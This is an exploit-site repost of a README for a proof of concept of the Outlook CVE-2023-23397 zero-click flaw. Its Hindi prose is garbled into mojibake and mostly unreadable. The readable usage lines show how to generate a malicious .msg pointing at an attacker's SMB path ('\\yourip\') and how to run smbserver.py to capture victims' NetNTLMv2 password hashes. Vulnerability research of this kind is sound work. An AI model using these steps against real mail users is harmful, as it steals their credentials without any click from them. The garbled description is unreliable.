## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TRACKFLAW-CVE-2023-23397
# CVE-2023-23397
Outlook рдерд┐рдХ рдХреНрд▓рд╛рдЗрдВрдЯ рдХреЛ рдкреНрд░рднрд╛рд╡рд┐рдд рдХрд░рдиреЗ рд╡рд╛рд▓реА CVE-2023-23397 рднреЗрджреНрдпрддрд╛ рдХрд╛ рд╕рд░рд▓ рдФрд░ рдЬрд▓реНрджрдмрд╛рдЬрд╝реА рдореЗрдВ рдмрдирд╛рдпрд╛ рдЧрдпрд╛ PoCред
## рд╡рд┐рд╡рд░рдг
Outlook рдореЗрдВ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЗрдирдкреБрдЯ рдкрд░ рдирд┐рдпрдВрддреНрд░рдг рдХреА рдХрдореА рд╣реИ, рдЬреЛ рдореАрдЯрд┐рдВрдЧ рдФрд░ рдЕрдкреЙрдЗрдВрдЯрдореЗрдВрдЯ рд░рд┐рдорд╛рдЗрдВрдбрд░ рдХреА рдзреНрд╡рдирд┐ рдХреЛ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ, рдПрдХ рд╣рдорд▓рд╛рд╡рд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреА рдУрд░ рд╕реЗ рдХрд┐рд╕реА рднреА рд╣реЗрд░рдлреЗрд░ рдХреЗ рдмрд┐рдирд╛ (рдЬрд╝реАрд░реЛ рдХреНрд▓рд┐рдХ рднреЗрджреНрдпрддрд╛) рдкреАрдбрд╝рд┐рдд рдХреЛ рдЕрдкрдиреЗ рд╕рд░реНрд╡рд░ рд╕реЗ рдХрдиреЗрдХреНрд╢рди рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдордЬрдмреВрд░ рдХрд░ рд╕рдХрддрд╛ рд╣реИред
рдЗрд╕ рднреЗрджреНрдпрддрд╛ рдХрд╛ рд╢реЛрд╖рдг рдХрд░рдиреЗ рд╡рд╛рд▓рд╛ рд╣рдорд▓рд╛рд╡рд░ SMB рдЕрдиреБрд░реЛрдз рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдлрдВрд╕реЗ рд╣реБрдП рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рдкрд╛рд╕рд╡рд░реНрдб рдкрд░ рдЖрдзрд╛рд░рд┐рдд NetNTLMv2 рдбрд╛рдЗрдЬреЗрд╕реНрдЯ рдкреНрд░рд╛рдкреНрдд рдХрд░рддрд╛ рд╣реИред рдореЗрд▓ рдЗрдирдмреЙрдХреНрд╕ рдореЗрдВ рдЖрддреЗ рд╣реА рдЕрдиреБрд░реЛрдз рдЯреНрд░рд┐рдЧрд░ рд╣реЛ рдЬрд╛рддрд╛ рд╣реИред
## PoC рдХреНрдпрд╛ рдХрд░рддрд╛ рд╣реИ?
1. `.msg` рдкреЗрд▓реЛрдб рдЙрддреНрдкрдиреНрди рдХрд░рддрд╛ рд╣реИред
2. рдЗрд╕реЗ рдХрд╕реНрдЯрдо SMTP рд╕рд░реНрд╡рд░ рдХреЗ рд╕рд╛рде рдИрдореЗрд▓ рджреНрд╡рд╛рд░рд╛ рднреЗрдЬрддрд╛ рд╣реИред
## рдЙрдкрдпреЛрдЧ
рдПрдХ рд╕рддреНрд░ рдореЗрдВ :
root@kitploit:~
python CVE-2023-23397.py
usage: CVE-2023-23397.py [-h] -p PATH
CVE-2023-23397.py: error: the following arguments are required: -p/--path
python CVE-2023-23397.py --path '\\yourip\'
рджреВрд╕рд░реЗ рд╕рддреНрд░ рдореЗрдВ (`smbserver` рдпрд╛ `responder` рдЬреИрд╕рд╛ рдЖрдк рдЪрд╛рд╣реЗрдВ)ред
root@kitploit:~
smbserver.py -smb2support SHARE .
## рдбреЗрдореЛ (рдореИрдиреБрдЕрд▓ PoC)

## рд╡реНрдпрд╛рдЦреНрдпрд╛рддреНрдордХ рд╡реАрдбрд┐рдпреЛ (рдлреНрд░реЗрдВрдЪ рднрд╛рд╖рд╛ рдореЗрдВ)

## рдореВрд▓ рд▓реЗрдЦ
https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/